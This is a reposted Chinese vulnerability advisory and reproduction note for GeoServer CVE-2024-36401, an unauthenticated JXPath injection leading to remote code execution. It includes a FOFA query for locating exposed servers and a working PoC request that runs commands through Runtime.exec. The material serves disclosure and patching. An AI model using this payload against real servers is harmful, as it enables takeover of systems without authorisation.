Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

admin 2024年7月4日22:25:14评论15 views字数 1399阅读4分39秒阅读模式
Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

 

0x02

产品介绍

GeoServer是一个开源服务器,用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准,使用户能够通过网络访问和操作地理信息系统(GIS)数据。
0x03

漏洞威胁

2024年7月,互联网上披露Geoserver表达式注入致远程代码执行漏洞(CVE-2024-36401),攻击者无需认证即可利用该漏洞获取服务器权限,建议受影响的客户尽快修复漏洞。
漏洞成因
该系统不安全地将属性名称解析为 XPath 表达式。GeoServer 调用的 GeoTools 库 API 以不安全的方式将要素类型的属性名称传递给 commons-jxpath 库。该库在解析 XPath 表达式时,可以执行任意代码。这种 XPath 评估本应仅供复杂要素类型(例如应用程序架构数据存储)使用,但由于错误,该机制也被应用于简单要素类型。这使得所有 GeoServer 实例都可能受到该漏洞的影响。
漏洞影响
此漏洞可能导致远程代码执行 (RCE)。未经身份验证的用户可以通过向默认的 GeoServer 安装发送特制的输入,利用多个 OGC 请求参数,如 WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic 和 WPS Execute 请求,从而执行任意代码。这种远程代码执行将导致系统被完全控制,严重威胁系统安全,可能造成数据泄露、勒索或更广泛的网络攻击。
影响范围
2.25.0 <= GeoServer < 2.25.2
2.24.0 <= GeoServer < 2.24.4
GeoServer < 2.23.6
0x04

漏洞环境

FOFA:

app="GeoServer"

Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

0x05

漏洞复现

PoC

POST /geoserver/wfs HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36Accept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8Content-Type: application/xmlConnection: close<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'>  <wfs:Query typeNames='topp:states'/>  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'执行的命令')</wfs:valueReference></wfs:GetPropertyValue>

Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

0x06

批量脚本验证

Nuclei验证脚本已发布

原文始发于微信公众号(冷漠安全):「漏洞复现」Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日22:25:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)https://cn-sec.com/archives/2921319.html

发表评论

匿名网友 填写信息